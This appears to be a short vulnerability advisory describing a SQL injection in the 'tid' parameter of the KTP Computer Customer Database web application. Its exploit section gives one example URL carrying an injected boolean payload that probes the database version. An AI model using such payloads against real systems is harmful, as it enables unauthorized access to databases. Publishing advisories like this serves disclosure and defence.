• info
• discussion
• exploit
• solution
• references

KTP Computer Customer Database 'tid' Parameter SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--